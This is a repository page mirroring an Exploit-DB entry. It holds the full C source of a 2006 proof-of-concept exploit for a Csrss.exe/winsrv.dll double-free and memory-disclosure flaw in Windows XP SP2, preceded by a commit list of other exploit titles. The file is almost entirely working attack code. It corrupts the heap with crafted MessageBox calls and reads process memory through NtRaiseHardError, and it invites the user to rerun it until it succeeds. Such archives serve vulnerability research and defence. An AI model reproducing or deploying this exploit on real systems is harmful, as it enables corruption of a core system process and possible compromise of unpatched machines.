bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/dos/3052.c
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

260 lines
8.4 KiB
C
Executable file
Raw Blame History

/////////////////////////////////////////
/////////////////////////////////////////
///// Microsoft Windows NtRaiseHardError
///// Csrss.exe-winsrv.dll Double Free
/////////////////////////////////////////
///// Ruben Santamarta
///// ruben at reversemode dot com
///// www.reversemode.com
/////////////////////////////////////////
///// 12.29.2006
///// For educational purposes ONLY
///// Compiled using gcc (Dev-C++)
////////////////////////////////////////
////// XP SP2
////////////////////////////////////////
#include <stdio.h>
#include <windows.h>
#include <winbase.h>
#include <ntsecapi.h>
#define UNICODE
#define MAGIC_VALUE 0x75b4cd40 // winsrv.dll data section
BOOL gFon=FALSE;
typedef LONG NTSTATUS;
typedef NTSTATUS (WINAPI *PNTRAISE)(NTSTATUS,
ULONG,
ULONG,
PULONG,
UINT,
PULONG);
// Csrss.exe memory monitor thread
// (Read csrss.exe memory disclosure exploit for details)
VOID WINAPI ReadBox2( LPVOID param )
{
HWND hWindow,hButton,hText;
DWORD hChunk,cHeader=0;
int i=0,b=0;
int gTemp;
char lpTitle[300];
char lpText[300];
char lpBuff[500];
ZeroMemory((LPVOID)lpTitle,250);
ZeroMemory((LPVOID)lpText,250);
ZeroMemory((LPVOID)lpBuff,300);
Sleep(2000);
for (;;)
{
lpText[0]=(BYTE)"";
Sleep(1000);
hWindow = FindWindow("#32770",NULL);
ZeroMemory((LPVOID)lpTitle,250);
ZeroMemory((LPVOID)lpText,250);
ZeroMemory((LPVOID)lpBuff,300);
if(hWindow != NULL)
{
GetWindowText(hWindow,(LPSTR)&lpTitle,250);
if(strcmp(lpTitle,"Aa")!=0)
{
hText=FindWindowEx(hWindow,0,"static",0);
GetWindowText(hText,(LPSTR)&lpText,250);
hText=GetNextWindow(hText,GW_HWNDNEXT);
GetWindowText(hText,(LPSTR)&lpText,250);
cHeader=*(DWORD*)lpText;
if( cHeader!=0)
{
if(cHeader >0x100000 && cHeader<0x400000)
{
printf("\n**************************\n");
printf("Heap Chunk Found! Good Luck!\n");
printf("New Value: 0x%p",cHeader);
printf("\n**************************\n");
}
else
{
printf("\n****************************\n");
printf("winsrv.dll data overwritten! \n");
printf("New Value: 0x%p",cHeader);
printf("\n****************************\n");
}
}
else
{
printf("\n****************************\n");
printf("nothing found! ");
printf("\n****************************\n");
}
cHeader=*(DWORD*)lpTitle;
if( cHeader!=0)
{
if(cHeader >0x100000 && cHeader<0x400000)
{
printf("\n**************************\n");
printf("Heap Chunk Found! Good Luck!\n");
printf("New Value: 0x%p",cHeader);
printf("\n**************************\n");
}
else
{
printf("\n****************************\n");
printf("winsrv.dll data overwritten! \n");
printf("New Value: 0x%p",cHeader);
printf("\n****************************\n");
}
}
else
{
printf("\n****************************\n");
printf("nothing found! ");
printf("\n****************************\n");
}
}
SendMessage(hWindow,WM_CLOSE,0,0);
ZeroMemory((LPVOID)lpTitle,250);
ZeroMemory((LPVOID)lpText,250);
ZeroMemory((LPVOID)lpBuff,300);
}
CloseHandle(hWindow);
}
}
VOID WINAPI ReadBox( LPVOID param )
{
HWND hWindow;
for (;;)
{
Sleep(1000);
if(!gFon)
{
hWindow = FindWindow("#32770",NULL);
if(hWindow != NULL )
{
SendMessage(hWindow,WM_CLOSE,0,0);
}
}
}
}
int main()
{
UNICODE_STRING uStr={5,5,L"fun!"};
ULONG retValue,args[]={MAGIC_VALUE,MAGIC_VALUE,(ULONG)&uStr};
PNTRAISE NtRaiseHardError;
DWORD dwThreadId;
byte *ShellCode ="\x5C\x3F\x3F\x5C\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
"\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
"\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
"\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
"\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
"\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
"\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
"\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
"\x40\xcd\xb4\x75\x40\xcd\xb4\x75\x40\xcd\xb4\x75"
"\x40\xcd\xb4\x75\x40\xcd\xb4\x75";
int i=0;
NtRaiseHardError=(PNTRAISE)GetProcAddress(GetModuleHandle("ntdll.dll"),
"NtRaiseHardError");
system("cls");
printf("##########################################\n");
printf("### Microsoft Windows NtRaiseHardError ###\n");
printf("### Csrss.exe-winsrv.dll Double-Free ###\n");
printf("## Ruben Santamarta www.reversemode.com ##\n");
printf("##########################################\n");
printf("## + Csrss.exe Double-Free Exploit ##\n");
printf("## + Csrss.exe Memory Disclosure Exploit##\n");
printf("##########################################\n");
printf("# XP SP 2 #\n");
printf("##########################################\n\n");
printf("\nThe exploit overwrites controlled addresses\n");
printf("in winsrv.dll data section within Csrss.exe\n\n");
CreateThread( NULL,
0,
(LPTHREAD_START_ROUTINE)ReadBox,
0,
0,
&dwThreadId);
// Seeding the heap
for(i=0;i<2;i++) MessageBoxA(0,"\x40\xcd\xb4\x75","\x40\xcd\xb4\x75", MB_SERVICE_NOTIFICATION);
// Exploiting Csrss.exe Double-Free
printf("[*] Stage 1 -= Hitting Heap =-\n\n") ;
printf("[+] Corrupting the heap (11 attemps)\n\n");
for( i=0; i<11; i++)
{
printf("#%d... ",i+1);
MessageBoxA(0, ShellCode,"A", MB_SERVICE_NOTIFICATION);
}
gFon=TRUE;
printf("\n\n[*] Stage 2 -= Scanning winsrv.dll data section =-\n\n") ;
Sleep(2000);
CreateThread( NULL,
0,
(LPTHREAD_START_ROUTINE)ReadBox2,
0,
0,
NULL);
args[0]-=0x20;
// Exploiting Csrss.exe memory disclosure flaw
for(i=0;i<0xF;i++)
{
args[0]+=4;
printf("\n#%d Reading at : [0x%p]\n",i,args[0]);
NtRaiseHardError(0x50000018,3,4,args,1,&retValue);
}
printf("\n[+] Exploit exiting\n\n");
printf("#############################################################\n");
printf("If you didn't find anything, run the exploit one more time!\n");
printf("If you find a heap chunk address, enjoy!\n");
printf("#############################################################\n");
}
// milw0rm.com [2006-12-31]
Reference in a new issue View git blame Copy permalink